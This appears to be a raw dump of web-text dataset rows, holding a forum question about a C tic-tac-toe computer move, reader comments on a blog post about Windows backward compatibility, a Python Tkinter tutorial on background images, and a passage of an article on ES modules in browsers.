text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
I'm trying to write a Tic Tac Toe game but I'm stuck at the computer AI. Basically for the computer move I need a random generator to pick a number and insert it into a 2D array.
The parts that I'm stuck at is writing a code so that computer doesn't pick a number that has been taken either by player X or has been previously been picked by computer O. I've tried several different things but can't get anything to work. If you guys know of any solutions that would be of great help.
Here is what I got:
#include <stdio.h> #include <stdlib.h> #include <time.h> #include <stdbool.h> #define MAX_ROWS 3 #define MAX_COLS 3 // Function Decleration void welcomeMsg (); void printGrid (char grid[][MAX_COLS]); void gridMove (char grid[][MAX_COLS]); int main (void) { //Local Declarations (most of these variables are just for testing, they are //not actually used by program. char position, move; int rowOne, rowTwo, rowThree; int colmOne, colmTwo, colmThree; int diagOne, diagTwo; int row, colum; int randRow, randColum; int range, randNo; int index; char empty; int i, j; int availableSp = 9; srand ( time(NULL) ); //2D array Initialization char table[MAX_ROWS][MAX_COLS] = { {'1', '2', '3'}, {'4', '5', '6'}, {'7', '8', '9'} }; //table //This is just a function that prints welcome message welcomeMsg(position); printf("Select X or O (X moves first)? "); scanf(" %c", &move); do { //Checks rows, colums, and diagonals for a winner. rowOne = (table[0][0] == table[0][1] && table[0][0] == table[0][2]); rowTwo = (table[1][0] == table[1][1] && table[1][0] == table[1][2]); rowThree = (table[2][0] == table[2][1] && table[2][0] == table[2][2]); colmOne = (table[0][0] == table[1][0] && table[0][0] == table[2][0]); colmTwo = (table[0][1] == table[1][1] && table[0][1] == table[2][1]); colmThree = (table[0][2] == table[1][2] && table[0][2] == table[2][2]); diagOne = (table[0][0] == table[1][1] && table[0][0] == table[2][2]); diagTwo = (table[0][2] == table[1][1] && table[0][2] == table[2][0]); if (rowOne || rowTwo || rowThree || colmOne || colmTwo || colmThree || diagOne || diagTwo == 1) break; printGrid (table); //Player Move printf("Enter the number of an available space, you are X: "); scanf("%d", &index); row = (index - 1) / 3; colum = (index - 1) % 3; table[row][colum] = 'X'; availableSp--; //Computer Move, and this is the part that I'm stuck at. range = (availableSp - 1) + 1; randNo = rand() % range + 1; randRow = (randNo - 1) / 3; randColum = (randNo - 1) % 3; if ((table[randRow][randColum] != 'X') && (table[randRow][randColum] != 'O')) { table[randRow][randColum] = 'O'; } availableSp--; printf("\nThe computer picked space %d\n", randNo); printf("\n%d\n\n", availableSp); } while (availableSp > 0); if (rowOne || rowTwo || rowThree || colmOne || colmTwo || colmThree || diagOne || diagTwo == 1) printf("You Won\n\n"); printGrid (table); return 0; } // main
Any help would be greatly appreciated. | https://www.daniweb.com/programming/software-development/threads/295891/tic-tac-toe-help-with-code | CC-MAIN-2017-43 | refinedweb | 473 | 54.76 |
not actually to establish a blogging point where individuals can enrich their learns on facilitating and leveraging .NET-related activities most effectively
Holy cow, I wrote a book!
Commenter
Myron A. Semack
asks
how much faster Windows would be if you took out the backward compatibility
stuff.
Myron is so anxious about this that he
asked the question a second time.
Asking a question twice typically counts as a reason
not to answer it, but since I had already written up the answer,
I figured I'd post it anyway.
Oh great,
and now he asked it a third time.
Myron is so lucky I already wrote up the answer,
because if I hadn't I would've just skipped the topic altogether.
I don't respond well to nagging.
The answer is, "Not much, really."
Because the real cost of compatibility is not in the hacks.
The hacks are small potatoes.
Most hacks are just a few lines of code
(sometimes as few as zero),
so the impact on performance is fairly low.
Consider
a compatibility hack for programs that mess up
IUnknown::QueryInterface:
IUnknown::QueryInterface
...
ITargetInterface *pti = NULL;
HRESULT hr = pobj->QueryInterface(
IID_ITargetInterface, (void**)&pti);
if (SUCCEEDED(hr) && !pti) hr = E_FAIL;
The compatibility hack here was just two lines of code.
One to set the pti variable to NULL
and another to check for a common application error and work around it.
The incremental cost of this is negligible.
pti
NULL
Here's an example of a hack that takes zero lines of code:
HINSTANCE ShellExecute(...)
{
...
return (HINSTANCE)42;
}
I count this as zero lines of code because the function has to return
something.
You may as well return a carefully-crafted value chosen for compatibility.
The incremental cost of this is zero.
No, the real cost of compatibility is in the design.
If you're going to design a feature that enhances the window manager
in some way,
you have to think about how existing
programs are going to react to your feature.
These are programs that predate your feature and naturally know nothing
about it.
Does your feature alter the message order?
Does it introduce a new point of re-entrancy?
Does it cause a function to begin dispatching messages
that previously did not?
You may be forced to design your feature differently in order to
accommodate these concerns.
These issues aren't things you can "take out";
they are inherently part of the feature design.
Consider for example color NTSC.
(Videophiles like to say that NTSC stands for "never twice the same color.")
The NTSC color model is backward compatible with the existing system
for black-and-white television.
How much cheaper would your color television be if you could take out
the backward compatibility circuitry?
That question misses the point.
The backward compatibility is in the design of the NTSC color signal.
It's not a circuit board
(or, to be more historically accurate, a set of vacuum tubes)
that you can pull out.
You can't "take out" the compatibility stuff from your television set.
The compatibility is fundamentally part of the way the NTSC color
signal works.
I wouldn't consider good error checking to be backwards compatibility hacks.
But, how different would Windows be if it didn't have to take backwards compatibility for undocumented behaviour into consideration when improving features? Well, I guess it'd partially be Windows x64 which could have tossed most backwards compatibility hacks if the app was 64-bit since obviously those apps don't need backwards compatibility with anything.
So what is it exactly about Vista that is making life harder for people?
Let's ignore for the moment that people just might not get it. You've said many times, when people have problems, they blame the OS.
My basic theory is that since Vista pushes the "standard user" login, many applications that are still writing to Program Files and HKLM are broken, and were always broken (people just ran as admin) and it's easy to just blame Vista. Games are notorious for "requiring Admin privileges" to cover up for lazy developers. You can even see this requirement on the box of some of the top-selling games of all time.
Is this just that particular competitors made enough funny but inaccurate commercials? After all, I made zero upgrades, haven't seen a UAC prompt for ages, and still use all of my peripherals but one from a nasty vendor who has simply decided to drop support.
Another cost of the backward compatibility hacks is that they hide bugs, making it much harder to find them. Defensive code is great, but not in your debug builds.
If my QueryInterface is messed up, it may be because of a deeper problem. Fixing up the HRESULT may mask the problem, reducing the chance it'll get noticed it or extending the time it would take to diagnose it.
Are there debug versions of core system DLLs (kernel, user, gdi, etc.) that developers can use while debugging? It would be cool if you could enable something assertion-like that would notify developers every time a compatibility hack saved their butts.
Raymond, no, it's about enforcing the documentation. The app developer is going to have to recompile their application for x64 anywho, why not take the opportunity to make it bet? I mean, I thought the SDL features were also about making things more secure, which may mean old hacks didn't work.
And I'm not sure I understand, if you go x64 on windows, a lot of features are automatically enabled by default (especially security ones). They're disabled by default (like DEP in IE7) on 32-bit due to backwards compatibility issues.
@CGomez: If Windows Vista's UAC is enabled, and an application is run which doesn't have a requiredExecutionLevel in its manifest (or no manifest at all), file system and registry redirection kick in. These redirect writes to some per-machine areas of the file system (e.g. Program Files, Windows) and the registry (e.g. HKLM\Software) to separate per-user stores. In Windows Explorer, you get a Show Compatibility Files button if there's a corresponding redirect folder for the current folder.
If UAC is disabled the ACLs are processed and an Access Denied error may be generated.
If a UAC-compatible manifest is present which sets a requiredExecutionLevel (asInvoker, highestAvailable, requireAdministrator) then, if the user allows the program to run (if highestAvailable or requireAdministrator), the redirects do not occur - you are expected to have fixed your program. As such you'll get Access Denied if you try to write to privileged locations (and you've not change the default ACLs).
UAC isn't actually that hard to understand for a developer.
Don't forget the cost to any newcomer when learning the API, since old API concepts, and calls/argument types/result types still linger around a long after after they are obsolete. To understand such an "organically grown" API, you effectively have to understand many of the preceding versions, even if they are totally irrelevant today.
Oh, and the technical reason is that the colour part of the NTSC signal only carries so-called 'chroma' information.. This has the useful additional effect of generally reducing the bandwidth required for the chroma signal.
PAL works much the same except that the phase of the chroma signal is inverted for each line compared to the previous one (hence Phase Alternating Line) to reduce the effect of noise. The French SECAM system has a compatible mono signal but encodes the colour differently, so UK receivers, if able to pick up a signal, could traditionally only see a monochrome picture (nowadays European receivers are multistandard and can decode and display PAL-60 and SECAM on their analogue tuners).
Similarly in FM stereo radio, the compatible mono signal is treated as Left + Right, while the 'stereo' subcarrier carries the differences between left and right (Left - Right). To get 'left' you sum the two signals (L+R + L-R = 2L), while to get 'right' you invert the stereo signal and sum (L+R + -(L-R) = L+R + -L + R = 2R).
<OT>One would think that a person who "specializes in the development of low-level software for mission-cricial ... systems" and a student of education could spell- and grammar-check their web presence before getting persnickety with others. Sorry, this adds nothing but I couldn't help myself.
The kind of compatibility hacks that can be removed in Win64 include a few major categories:
1. Things that were required for 16-bit; since 16-bit apps cannot run on a CPU in 64-bit mode, anything required strictly for 16-bit apps can be removed.
2. Things that require code to be rewritten; for example anything that generates code will need a 64-bit code generator, so obviously disabling DEP on the generated code can be part of it, thus DEP can be enabled by default. There are many 32-bit programs that generate code (JITters) or have self-modifying code which would break if DEP were on by default.
3. Things that require a recompile; for example it's impossible to make a 32-bit driver work on Win64, so at the very least it will have to be recompiled. As long as it can be recompiled, it can be signed, so signed drivers can be made a requirement on Win64.
Once upon a time while debugging a nasty localization bug, my coworker and I had to look at the source for the Windows edit control. I wear that emotional scar to this day.
In addition to the Debug Builds of various Windows binaries, there is a nice tool called the application verifier (). Some of us (in networking at least) are thinking of adding more rules to that for pointing out to developers that they are using an API incorrectly, but taking advantage of the existing set of warnings it generates is a good thing.
-- Ari
Nitpicking the comments now...I've sunk to a new low...
."
Sorry, this isn't correct (and assuming there's anyone reading who really wanted to know the scoop on NTSC and its backwards compatability...)
The original broadcast TV signal in the US was a simple DC voltage level, with some special timing characteristics. The level was used to drive the intensity of the (one) electron gun in early TVs, producing the fabled black-and-white TV signal.
When color TV was introduced, the NTSC wanted to be able to transmit color TV signals that would still work on older B&W TVs. That meant that any changes to the signal format to include color information had to be designed such that an older TV would produce a reasonable B&W picture. Introducing a "breaking change" to the signal would have cut out about 95% of the TV market.
They came up with a remarkably clever scheme. They divided the color signal into three parts: the "Luma" (luminosity, the brightness of the picture), the "Chroma Hue" (the particular color of the picture) and the "Chroma Saturation" (how intense the color was). The Luma signal was the same as the old broadcast signal, so older TVs would see this as their entire picture. The Chroma Hue was encoded as a high-frequency "rider" on the Luma, with its frequency fixed (at 3.58MHz) and its amplitude encoding the Chroma Saturation. The Chroma signal frequency was synchronized (in the days before PLLs and highly-accurate oscillators) to a "color burst" repeated regularly in the signal.
I'm an old hand at NTSC signals, and I still think the engineering solution was stunningly elegant for its time. For more information (than you ever wanted), check Wikipedia [].
And now there's a "breaking change": the ATSC broadcast standard, which is a digital encoding, provides multiple aspect ratios, resolutions, and compression parameters...and is hardly used at all.
@Mike Dimmick;
I never thought UAC was difficult for a developer. I'm just positing why there is all this negative press on Vista not being compatible with anything. Every review or "reputable" magazine out there says "Make sure all your hardware and software works, and be prepared to buy new."
This is said every time there is an OS release, but for some reason this time it seems to really be resonating. Reasonable developers that I know are saying "Oh, Vista is crap... just a pretty interface over XP."
Back to the point. With everything Raymond espouses about MSFT taking great pains to ensure backward compatibility, why is there such a negative view of Vista? I mean, assuming that many people at MSFT share the view that breaking changes just make users grumpy, there shouldn't be many problems?
And I shared my example to show just how few problems I've had. One to be exact... vendor's fault.
Perhaps what people need to understand better is that a major Windows design point is backwards compatibility. Pretend that the MS developers are told that this is job #1. Easy to understand decisions now ... and since performance is a close #2, it is great that it performs as well as it does, and I am glad that my kids crappy games still run. Saves me $$ ... so WINDOWS SAVES ME MONEY.
The backwards compatibility entries remind me of DOS and 16-bit Windows applications that would work fine in Windows '95, but would fail in NT and OS/2.
The operating system was simply enforcing boundaries the application was crossing. But it the blame was squarely placed on the platform.
I also remember the old Parity Check error screen, sort of a Blue Screen of Death in those good old DOS days. The memory system was preventing use with a known hardware problem that would eventually corrupt data. Many folks flipped the non-parity switch to "avoid" the issue. Yes it was rotten when you lost that spreadsheet, but it was worse when hard disk FAT became scrambled.
Raymond,
For what it's worth, I honestly wasn't trying to nag you. I’m sorry if it came across that way.
Post #1: I asked the question in a blog comment. I had forgotten that your blog has a Suggestion Box. I screwed up.
Post #2: I said to myself, "Oops, I should have put the question in the Suggestion Box". So, I re-posted it there. I figured that if I didn't post the question in the Suggestion Box, it wouldn't get answered. I was trying to fix my mistake.
Post #3: I was actually responding to one of the other people who were posting comments. I was trying to explain my question and the reasoning behind it. Post #3 wasn't directed at you.
So, actually, I only asked you the question twice, not three times. :-) And I only asked it twice because I made a mistake about where I posted it the first time.
Coming at it from further out, NT was an upgrade, Win95 was a compatability hack. As was Win98, and Millineum. Not entirely true, but not entirely false, as fleets of 3.1 application took liberties with the underlying 16-bit USER.EXE architecture. Win95 programs were slowed by this, as lots of core calls were serialized. For clean-and-fast, run NT!
In my opinion backwards compatibility is a non-issue. Suppose an application is designed and tested for Windows 2000. When Windows XP or Vista came out, it should not be assumed to work for those platforms. Rather, appropriate porting and testing needs to be done first.
When .Net 1.0 initially came out, it appeared that the versioning features would actually work like this. So if a n application targeting .Net version 1.0 was developed, it would execute under 1.0 even if 1.1, 2.0, 3.0 etc co-existed. This gave me so much hope that .Net could make a clean break from backward compatibility and actually fix the real problems instead of just supplementing them.
However, in reality nothing has changed. People want their old code to work unported and untested on new platforms and new versions. So old broken code remains and new, fixed functions are added.
As a developer, it's a little depressing sometimes.
"As a developer, it's a little depressing sometimes."
As a developer, I love it. I hate being called back to work on old projects to port them to new systems. BORING.
J,
That is a rather irresponsible attitude. Even with assumed backward compatibility, you need to at least verify that you application still functions appropriately on a new version and platform. Depending on the results, some porting may be necessary.
I don't think NTSC is a good exmaple of cheap compatibility; it wasn't (and isn't) cheap at all; the compatibility "circuit" is everything involved in YUV.
The only reason the YUV colour-space exists at all is because original B&W is roughly what we now consider the "luminance value". Every CRT/LCD television can display only 3 colours; Red, Green and Blue. YUV doesn't map into that colour-space except by a massive loss of precision (RGB555 usually goes to 11.5 bits).
It requires special conversion circuits and sometimes multiple conversion passes. There is utter madness going on inside MPEG-2/4 set-top-boxes because of this compatibility.
BTW; PAL has the same problem.
Well Raymond you've pointed out that compatibility hacks don't put such high penalty on performance since backwards compatibility costs are, and I quote "Real cost of compatibility is in the design"
So logically the question should be rephrased as: how much "better designed" Windows would be if you took out the backward compatibility stuff?
And the answer is?
Raptor
> And the answer is?
The answer is totally irrelvent because nobody would be using it. You can have the most elegant design in the world, but what's the point if nobody wants to use it?
<BLOCKQUOTE>And now there's a "breaking change": the ATSC broadcast standard, which is a digital encoding, provides multiple aspect ratios, resolutions, and compression parameters...and is hardly used at all.</blockquote>
Maybe you meant not used as much, considering TVs that have ATSC decoders only tend to be a few years old, and stations broadcasting in ATSC really came online the past few years?
Fact is, people have noticed that their cable and satellite TV of local channels looks worse than their ATSC counterparts. Cable and satellite compress the heck out of their HDTV signals, while ATSC tends to have few others sharing subchannnels, thus leaving plenty of bandwidth for the signal. One regular channel on cable can easily host 4-16 channels using digital cable - 64-128 channels for music. If your TV supports QAM, do a channel scan - even encrypted channels will cause it to lock, but it won't decode.
The recent resurgence in the humble UHF loop antenna is proof - this time, people who want the best picture and sound ditch their cable/satellite locals, and use the OTA versions. Which is why satellite receivers and the Series3 TiVo have not only their regular cable/satellite input, but also ATSC.
Dean Harding,
Please speak for yourself. I for one would use it and welcome it. I am tired of all of the "compatibility hacks". As a developer I spend more time reading documentation for all of the technical limitations, workarounds, and "gotchas" to poorly designed functions than actually writing code. .Net 1.0 was a huge improvement. However, with future versions it's just a repeat performance.
Backward compatibility is not necessary and only gives developers a false sense of security. Assuming that a product developed for a specific platform and version will automatically work untested and unmodified on a future unknown platform and version is irresponsible and unrealistic. Even with the current backward compatibility, a certain level of testing is still required and some changes are occasionally needed.
Craig: I'm sure TV manufacturers bemoan the fact that NTSC had to be backwards compatible with B&W, too...
I wonder if lessons learned with past APIs cause Microsoft platform developers to write their API functions a lot more defensively than those of the early days?
I've been burned by similar things (on a much smaller scale!) myself, and I've learned that callers will take any liberty they can get away with, so it's best to make them crash and burn rather than silently fixing their stuff. Obviously old functions can't crash and burn like this, but new functions can.
I wonder if the .NET Framework wasn't intended in part to solve this problem. "Managed code" is by definition a lot more rigid and "un-abusable" than the native code functions of the Windows API.
Nobody correctly nitpicked the NTSC example:
The color frame rate of NTSC is 29.97 fps (interlaced) due to a very complicated choice of color carrier frequencies in order to prevent distortion to black and white TVs (the luma carrier in general). It involved several years of work by the Rand corporation and has prime numbers and common denominators.
The fact that the frame rate was dropped .03 fps meant the power supply could no longer be synchronized to AC power. This greatly complicates the high voltage power supply design of CRT televisions to this day.
PAL is 25 FPS even, but due to the large number of countries and their compatibility issues there's an amazing number of variants (PAL-A thru N + K')
"Backward compatibility is not necessary and only gives developers a false sense of security."
Backward compatibility is necessary for Microsoft's bottom line!
Since the hacks are so small, why is the AppPatch directory on Windows XP almost 5 MB ?
i think godwin's law is going to need to be supplemented with 'mikeys law of windows' which says: 'As an online discussion grows longer, the probability of a comparison involving UAC approaches one.'
@ craig. you are pretty cute and naive. it will be nice to see you on the other side of the 'newbie to commercial compatibility' phase.
basically, you need to realise that ms is satisfying corporate need here. they don't neccessarily write the programs they are using. but they want them on the new os anyway. if it doesn't work, they won't upgrade. and ms does not earn money. the simple answer? make them work. if it takes compat hacks, then so be it. at least the windows continues to be commercially viable, and while it's viable we can add NEW things and GOOD things, while keeping the big paying customers on board.
the blog would be a much quieter place if people understood this, and similar, concepts :)
i, as a developer, am very happy and often impressed with ms' compat implementations and stories.
"That is a rather irresponsible attitude. Even with assumed backward compatibility, you need to at least verify that you application still functions appropriately on a new version and platform."
No I don't. That's what we pay our testers for. If no issues appear, then I don't do anything.
mikey,
With over 30 years of experience in software development, I am hardly a "newbie" anymore.
I fully realize why backward compatibility exists. However, developers constantly abuse it: assuming that their application targeting a specific platform and version will magically work on future versions without any testing (and needed porting). I have seen countless applications fail due to this.
If you're at a large enough company there will often be testers. However, at many smaller places, developers are the testers. And developers usually do not want to test (not talking about unit tests).
I agree with Alan and Craig.
Each new release of the API and framework gets uglier, dirtier, and complicated. The broken functions and types are fairly fixed (backward compatibility) while new ones are made to replace them.
I was much more productive with older versions of the Windows API than I am now. Perhaps the most productive I have ever been was with the initial version of the .Net Framework. However, since 1.1 and especially 2.0, it is taking more time to sift through the compatibility "trash".
While I would like to always write perfect code, I do make mistakes. When this happens, I would hope that my application would fail so that I can fix it. However, all too often internal hacks hide the problem.
That is not to say that I do not appreciate the newer functionality. However, I would like the trash that it replaces to be removed. It will not break my app because when I developed it it was for a specific version which will not change.
The trash continues to grow, but no one is willing to take it out.
One persons trash is another persons treasure.
You can bet that there are multi-billion-dollar corporations with internal tools that relies heavily on that trash.
[quote user="Craig Williams"]
[/quote]
As a customer, I'll be sad if the manufactorier no longer maintance the codes.
Consider CompanyA's multi-port modem boards. It includes drivers for Win2k but the driver software does not work on WinXP or above. The company later has brought by CompanyB and they refuse to provide free software updates for original CompanyA customers. Additional HKD$5000 must be paid for the new driver software bundle. That's the exact reason why we still have one Win2k server not be upgraded to Win2003.
It's sad that both CompanyA and CompanyB are large and famous ones.
Cheong,
Sounds to me like the customer got what they paid for: drivers desired and tested for Windows 2000. Why would you expect it to magically work on another platform? Even _if_ it did work on Windows XP or 2003, that is only by chance and is not something that you can rely on without proper testing and verification. Same with other versions. There are a great many applications (especially games) designed for XP that will not run properly under Vista. Backward compatibility did not help as much as thought.
[In other words, you want to make it harder for people to port their
programs to 64-bit Windows. "I have this program that works just fine
on 32-bit Windows, but it crashes randomly on 64-bit Windows. 64-bit
Windows is so buggy." -Raymond]
So, all the 16-bit hacks were faithfully reproduced in 32-bit and now in 64-bit?
> So, all the 16-bit hacks were faithfully reproduced in 32-bit and now in 64-bit?
Wow, you're so smart for showing up Raymond like that! Please give your full name and address and I'll send you a medal.
So each time new Windows (k + n) version comes out we should buy all our peripherals over and over again?
> So each time new Windows (k + n) version comes out we should buy all our peripherals over and over again?
No, clearly not, but we should keep in mind that it isn't only Microsofts responsibility to make sure that the hardware still works flawlessly, in a perfect world, the hardware companies would provide driver updates to every piece of hardware that is still in use by the customers. Same goes for software that relies on the APIs provided by Microsoft.
Clearly, the real world isn't perfect, so Microsoft adds enough hacks so that most of the old hard- and software works with newer OS versions, because otherwise, nobody (=not enough people to make it a success) would use the new OS.
So basically, MS has not much of a choice, so it would be a bit unfair if we would blame developers like Raymond for slowing down the OS due to compability hacks, OK?
Also, I think, the application and hardware developers also don't always have much of a choice, because I wrote "... the hardware companies would provide driver updates to every piece of hardware that is still in use by the customers ..." - and that can be a long time. Sometimes, hard- and software is still in use that hasn't been sold any more more years. So it would be damn expensive to still provide updates.
And the customers also don't have that much of a choice, because buying a completely new system every few years can be just to expensive, so old hard- and software is sometimes used as long as possible.
Seems as if nobody really has much of a choice ... | http://blogs.msdn.com/oldnewthing/archive/2007/07/23/4003873.aspx | crawl-002 | refinedweb | 4,796 | 64.2 |
It's not the same without you
Join the community to find out what other Atlassian users are discussing, debating and creating.
Is it possible to run a post function which creates a subtask and copies all attachments from the parent issue to the subtask; with the obvious restriction that everything is done via the REST APIs? Editmeta for an issue shows that the attachments key has no operations; and that leaves this as the only method for attachment addition.
I found this answer () but it relies on copying the file to disk temporarily. I'm assuming that the ScriptRunner Cloud containers do not allow you to do this; or that it would be unreliable for larger files given the 30sec timeout.
The ideal way would be to simply add attachment IDs from Issue A to Subtask B, but I get the feeling each Issue needs its own copy of an attachment.
Edit: Fixed link
You should be able to clone attachments using the following code in a post function:
import org.apache.http.entity.ContentType; def createReq = Unirest.post("/rest/api/2/issue") .header("Content-Type", "application/json") .body([ summary: "Cloned issue" ]) .asObject(Map) assert createReq.status >= 200 && createReq.status < 300 def clonedIssue = createReq.body // copy attachments if (issue.fields.attachment) { issue.fields.attachment.collect { attachment -> def url = attachment.content as String url = url.substring(url.indexOf("/secure")) def fileBody = Unirest.get("${url}").asBinary().body def resp = Unirest.post("/rest/api/2/issue/${clonedIssue.id}/attachments") .header("X-Atlassian-Token", "no-check") .field("file", fileBody, ContentType.create(attachment['mimeType'] as String), attachment['filename'] as String) .asObject(List) assert resp.status >=200 && resp.status < 300 } }
EDIT: added package import and other code fixes from comments below
Hi @Jon Bevan [Adaptavist], I've tried your code in a post-function on a transition, but I get an error on this line:
def fileBody = Unirest.get(
"${url}"
).asBinary().body
GET request to[] returned an error code: status: 403 - Forbidden
body: {"error": "Add-on 'com.onresolve.jira.groovy.groovyrunner' blocked from impersonating the user because the access token does not have the required scope(s)"}
error code: status: 401 - Unauthorizederror code: status: 401 - Unauthorized
It is running as 'Initiating user'. I also tried running it as add-on user, but then it gives me an
Do you have any idea how to resolve this?
Thanks
Hi Rudy,
The 401 Unauthorized gives me the impression that the Initiating user might not have permission to view the attachment (or perhaps the issue its attached to).
Thanks, Jon
I'm running it as myself and when I directly go to in my browser the logo loads. So I don't think I have a permission issue from that perspective.
Any other thoughts?
Hi @Jon Bevan [Adaptavist],
I've got ride of the 401 error, by adding the add-on user to the correct project role.
Unfortunately it still does not work.
I get a compile error on: ContentType.create(attachment.mimeType)
Because it is not declared. When I try to import the class with:
import groovyx.net.http.ContentType
ScriptRunner cannot resolve the class.
What am I missing here?
Thanks,
Rudy
Ok, I found out that it was not the correct library to import.
For future reference use:
import org.apache.http.entity.ContentType;
And casting to String will also help
.field("file", fileBody, ContentType.create(attachment['mimeType'] as String), attachment['filename'] as String)
Ciao and thanks Jon for pointing me in the right direction.
Glad you got it working Rudy, and thanks for the correct import - I've updated the code above to reflect your fixes
> The ideal way would be to simply add attachment IDs from Issue A to Subtask B, but I get the feeling each Issue needs its own copy of an attachment
You have the right feeling
. Each issue needs own copy of the attachment.
> Is it possible to run a post function... with the obvious restriction that everything is done via the REST APIs
Calling REST API from the post-function looks strange for me. Once you are coding the post-function it's better to rely on JIRA Java API.
Missed the script-runner tag. Apologies. Please refer to Jamie's comment.
It should certainly be possible from the perspective of whether the rest apis can do it. I'm not sure if you can write to local disk to be honest, but anyway, you should be able to stream the output of one call to the input of another. Or just hold the entire attachment file in memory. @Jon Mort (Adaptavist) - any ideas?
Holding in memory was my initial idea, but I worry about failure when the Script times out if we are looking at larger files (not likely in my use case, but I figure make this a relevant question for people who come back to this question with bigger files)
Also, doesn't the blocking aspect of the HTTP calls prevent you directly streaming from one input call to an output? I would have thought that you would need to do:
Input-A starts=>block execution=>read all the attachments to file/memory=>Input-A Closes
and then
Output-B starts=>block execution=>write all data to stream=>Output-B. | https://community.atlassian.com/t5/Jira-Core-questions/Copy-attachments-to-one-issue-to-another-with-Scriptrunner-Cloud/qaq-p/31303 | CC-MAIN-2018-51 | refinedweb | 874 | 56.96 |
In this Python Tkinter tutorial, we will learn how to set background to be an image in Python Tkinter.
Set Background to be an Image in Python Tkinter
- There are more than one ways to add background images but one this is common in all of them that we use the Label widget to set the background.
- The simplest way to do this is to add a background image using PhotoImage() and place other widgets using Place geometry manager.
- Place geometry manager allows users to put the widget anywhere on the screen by providing x & y coordinates. You can even overlap the widgets by providing the same coordinates.
- PhotoImage() takes a file path as an argument and can be used later in code to display images. P
hotoImage(file='image_path.png')
- The Only drawback of using PhotoImage is it works only with png images.
- In case you want to use other formats like jpeg in that case you can use pillow library
- use command:
pip install pillowto install this library
Code:
In this code, we have added a background image to the Python application. Other widgets like Text and button widgets are placed on the background image.
from tkinter import * ws = Tk() ws.title('PythonGuides') ws.geometry('500x300') ws.config(bg='yellow') img = PhotoImage(file="python-tkinter-background-image.png") label = Label( ws, image=img ) label.place(x=0, y=0) text = Text( ws, height=10, width=53 ) text.place(x=30, y=50) button = Button( ws, text='SEND', relief=RAISED, font=('Arial Bold', 18) ) button.place(x=190, y=250) ws.mainloop()
Output:
This is simple a dummy of email sending mechanism but it has a beautiful background image.
You may like the following Python Tkinter tutroials:
- Python tkinter label
- Python Tkinter Entry
- Python Tkinter Button
- Python Tkinter radiobutton
- Python Tkinter Checkbutton
- Python Tkinter Autocomplete
In this tutorial, we have learned how to set background to be an image in Python Tkinter
Entrepreneur, Founder, Author, Blogger, Trainer, and more. Check out my profile. | https://pythonguides.com/set-background-to-be-an-image-in-python-tkinter/ | CC-MAIN-2022-21 | refinedweb | 334 | 54.63 |
Introduction
ES modules have been the talking point in the JavaScript community for a long time. The main goal of them is to bring an official standardization of module systems in JavaScript. When something becomes a standard in JavaScript, there are two main steps involved. First, the spec has to be approved and finalized by EcmaScript, which has been done. Second, the browsers should start implementing it. This step is a bit time consuming and comes with all the hassles of backward compatibility.
The good news is there has been great progress on browser support for ES modules. The below chart shows that all major browsers including Edge, Chrome, Safari, and Firefox (+60) do support ES modules:
When it comes to modules, there have been several attempts to bring this functionality into the JavaScript world. For example:
- Node.js has implemented its own module system
- Bundlers and build tools such as Webpack, Babel, and Browserify integrated module usage
So with these efforts, few module definitions have been implemented. The two lesser-used ones are:
However, the leading ones are:
- CommonJS which is the Node.js implementation of module
- ES modules which is the native JavaScript’s standard for defining modules
There are a few things we will not be covering in this article:
- We will not focus on CommonJS unless it has a direct feature to ES modules. If you are interested in learning more about this module system, please read this article
- Even though there is support for ES modules on Node, our main focus for this article is on the usage of ES modules in browsers natively. If you are interested in learning more about ES modules support in Node, I suggest this official documentation, as well as this and this article
Why do we even need ES modules?
To answer this question, we need to go way back to the fundamentals of JavaScript. In JavaScript, like many other programming languages, a large portion of our focus is on building, managing, and using variables and functions. You can consider these as building blocks that will be used together to form logical sequences that deliver an end result to the user. However, as the number of variables, functions, and files that contain them increases so does the importance to maintain them. For example, you cannot have the change of a variable unexpectedly affect other unrelated parts of the code, even if they share the same name.
In a file level, we have solved this problem. You can utilize variables and functions and also cannot access and manipulate variables outside of function scopes. And if you need to have a common variable that is shared among different functions, you will put it on top of the file, so all of them can access it. This is demonstrated in the code below:
// file.js"; } }
But what about having such a mechanism between different files?
Well, as a first attempt, you might want to do something similar. Imagine several files in your codebase need access to a certain type of library. That library, like jQuery, could be a selection of helper functions to help your development workflow. In such a scenario, you need to put the library instance somewhere that can be accessible to all the files that might need it. One of the initial steps of handling this was to put the library on a global script. Now you might think since these global scripts are instantiated in the entry file where all the other files have access, then the issue of sharing access to certain functionalities or libraries will become easier, right? Well, not really.
This approach comes with certain problems. The dependency between different files and shared libraries will become important. This becomes a headache if the number of files and libraries increases because you always have to pay attention to the order of script files, which is an implicit way of handling dependency management. Take the below code for instance:
<script src="index1.js"></script> <script src="index2.js"></script> <script src="main.js"></script>
In the code shown above, if you add some functionalities in
index1.js file that references something from
index2.js, those functionalities will not work because the code execution flow has still not reached
index.2 at that point in time. Besides this dependency management, there are other types of issues when it comes to using script tags as a way of sharing functionalities like:
- Slower processing time as each request blocks the thread
- Performance issue as each script initiates a new HTTP request
You can probably imagine refactoring and maintaining code that relies on such design is problematic. Every time you want to make a change, you have to worry about not breaking any other previous functionalities. That is where modules come to the rescue.
ES modules or, in general, modules are defined as a group of variables and functions that are grouped together and are bound to a module scope. It means that it is possible to reference variables in the same module, but you can also explicitly export and import other modules. With such an architecture, if a certain module is removed and parts of the code break as a result, you will be able to understand what caused the issue.
As mentioned before, there have been several attempts to bring the module design to JavaScript. But so far the closest concept of a native module design has been ES modules which we are going to examine in this article.
We are going to see a few basic examples of how ES modules are used and then explore the possibility of using them in production sites. We’ll also look at some tools that can help us achieve this goal.
ES modules in browsers
It is very easy to define a module in browsers as we have access to HTML tags. It would be sufficient to pass a
type='module' attribute to the script tag. When the browser reaches any script tag with this attribute, it knows that this script needs to be parsed as a module. It should look something like this:
// External Script <script type="module" src="./index.js"></script> // Inline Script <script type="module"> import { main } from './index.js'; // ... </script>
In this case, the browser will fetch any of the top-level scripts and put it in something called
module map with a unique reference. This way, if it encounters another script that points to the same reference, it just moves on to the next script and therefore every module will be parsed only once. Now let’s imagine the content of the
index.js looks like this:
// index.js import { something } from './something.js' export const main = () => { console.log('do something'); } //..
When we look at this file we see both
import and
export statements which are ways of using and exposing dependencies. So when the browser is completing its asynchronous journey of fetching and parsing these dependencies, it just starts the process from the entry file which, in this case, was the HTML file above and then continues putting references of all the nested modules from the main scripts in the
module map until it reaches the most nested modules.
